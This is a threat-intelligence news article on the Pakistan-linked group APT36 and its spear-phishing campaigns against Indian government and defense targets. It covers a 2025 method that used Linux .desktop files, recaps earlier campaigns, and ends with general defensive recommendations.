In recent developments, the Pakistani state-sponsored hacking group known as APT36 has escalated its cyberespionage activities targeting Indian government and defense sectors. Active since at least 2013, APT36—also referred to as Earth Karkaddan, Mythic Leopard, Operation C-Major, and Transparent Tribe—has a history of conducting cyber operations against Indian entities.
Evolution of Attack Techniques
In August 2025, APT36 introduced a novel infection method by utilizing Linux desktop entry (.desktop) files to deliver malware. These files, which are plain text configuration files defining shortcuts and launchers, were distributed through procurement-themed phishing campaigns. The malicious .desktop files were embedded within ZIP archives, masquerading as legitimate documents. Upon opening, they would retrieve a dropper from Google Drive and simultaneously display a decoy PDF file in the Firefox browser.
The dropper is designed to perform anti-debugging and anti-sandbox checks, establish persistence on the infected system, and initiate communication with the command-and-control (C&C) server using WebSockets. The incorporation of Google Drive into their attack lifecycle signifies a significant advancement in APT36’s capabilities, introducing spear-phishing vectors that pose heightened risks to Linux-based government and defense infrastructures.
Historical Context and Previous Campaigns
APT36 has a documented history of targeting Indian government entities through various sophisticated campaigns:
– Operation Celestial Force: Active since at least 2018, this campaign employed both Android and Windows malware to target individuals in the Indian defense, government, and related technology sectors. The threat actor, tracked as Cosmic Leopard, exhibited overlaps in tactics, techniques, tooling, and victimology with Transparent Tribe, a known Pakistan-linked state-sponsored group. The operation’s longevity and evolving malware suite indicate a high degree of success in targeting users in the Indian subcontinent.
– Operation C-Major: Uncovered by Trend Micro, this campaign involved attackers believed to be from Pakistan targeting Indian military personnel through social engineering and unsophisticated malware. The operation resulted in the theft of information from at least 160 military officers, including copies of passports, financial information, strategic documents, and personal photographs. The attacks began with bogus emails purporting to come from organizations such as India’s Ministry of Defense, designed to trick recipients into opening malicious attachments.
– Operation Transparent Tribe: Detailed by Proofpoint, this campaign involved an APT group believed to be based in Pakistan targeting Indian government and military personnel using spear-phishing emails and watering hole attacks. The attackers registered fake domains and used them to send emails referencing the Indian government’s 7th Central Pay Commission, with attachments exploiting vulnerabilities to deliver remote access Trojans (RATs).
Implications and Recommendations
The continuous evolution of APT36’s attack vectors underscores the persistent cyber threat faced by Indian government and defense entities. The group’s ability to adapt and employ sophisticated techniques, such as leveraging legitimate cloud services like Google Drive for malware delivery, highlights the need for enhanced cybersecurity measures.
To mitigate such threats, organizations should consider the following actions:
1. Employee Training: Conduct regular cybersecurity awareness programs to educate staff about phishing tactics and the importance of scrutinizing unsolicited emails and attachments.
2. System Hardening: Implement robust security configurations for Linux systems, including disabling unnecessary services and applying the principle of least privilege.
3. Regular Updates: Ensure all systems and software are up-to-date with the latest security patches to protect against known vulnerabilities.
4. Network Monitoring: Deploy advanced intrusion detection and prevention systems to monitor network traffic for signs of malicious activity.
5. Incident Response Planning: Develop and regularly update incident response plans to ensure swift action in the event of a security breach.
By adopting a comprehensive cybersecurity strategy that includes these measures, Indian government and defense entities can enhance their resilience against the evolving threats posed by groups like APT36.
